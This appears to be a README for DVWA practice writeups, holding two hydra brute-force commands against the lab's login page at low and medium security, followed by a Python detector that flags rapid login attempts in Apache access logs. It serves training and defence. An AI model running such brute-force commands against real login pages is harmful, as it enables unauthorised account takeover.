A collection of detailed writeups demonstrating exploitation techniques against the vulnerabilities in Damn Vulnerable Web Application (DVWA).
This repository serves as an educational resource for security enthusiasts, penetration testers, and students to understand and practice exploiting common web vulnerabilities found in DVWA. It provides step-by-step exploitation examples and techniques to enhance web security knowledge and training.
This repository is intended for educational and training purposes only. Users should have DVWA set up locally or in a controlled environment to safely practice these techniques. The examples rely on hydra and require appropriate permissions to run brute force attacks.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie\: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
Performs a brute force attack on DVWA's low security login page using hydra with the rockyou.txt password list.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
Executes a brute force attack on DVWA's medium security login page, demonstrating increased response delay on failed attempts.
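From the defender's side, both commands above send every guess as a GET request to /vulnerabilities/brute/, so each attempt is recorded in the web server's access log, and a per-request delay slows the guessing without hiding it from a rate check. The detector below is an added example, not code from this repository; it assumes Apache combined log format, and the log lines, IP addresses, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

BRUTE_PATH = "/vulnerabilities/brute/"  # path taken from the hydra commands above
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" (\d{3}) ')

def _line(ip, sec, pw, path=BRUTE_PATH):
    """Build one constructed access-log line (sample data, not a real capture)."""
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] "GET {path}'
            f'?username=admin&password={pw}&Login=Login HTTP/1.1" 200 4500')

# Constructed sample: one source guessing every 2 s, one user who mistypes once.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", s, f"guess{s}") for s in range(0, 40, 2)]
    + [_line("10.0.0.9", 10, "typo"), _line("10.0.0.9", 45, "right")]
    + ['10.0.0.9 - - [01/Jan/2024:10:00:50 +0000] "GET /index.php HTTP/1.1" 200 1200']
)

def parse_attempts(log_text):
    """Yield (ip, timestamp) for every login attempt sent to the brute-force page."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a GET request or not in the assumed log format
        ip, ts, target, _status = m.groups()
        url = urlsplit(target)
        if url.path != BRUTE_PATH or "password" not in parse_qs(url.query):
            continue
        yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")

def flag_bruteforce(log_text, max_attempts=5, window=timedelta(seconds=60)):
    """Return {ip: peak attempts inside any sliding window} for noisy sources."""
    by_ip = defaultdict(list)
    for ip, when in parse_attempts(log_text):
        by_ip[ip].append(when)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = peak = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # drop attempts that fell out of the window
            peak = max(peak, end - start + 1)
        if peak > max_attempts:
            flagged[ip] = peak
    return flagged

if __name__ == "__main__":
    print(flag_bruteforce(SAMPLE_LOG))
```

Because the form uses GET, the guessed passwords themselves also land in the access log, which is worth treating as sensitive data when the logs are stored or shipped.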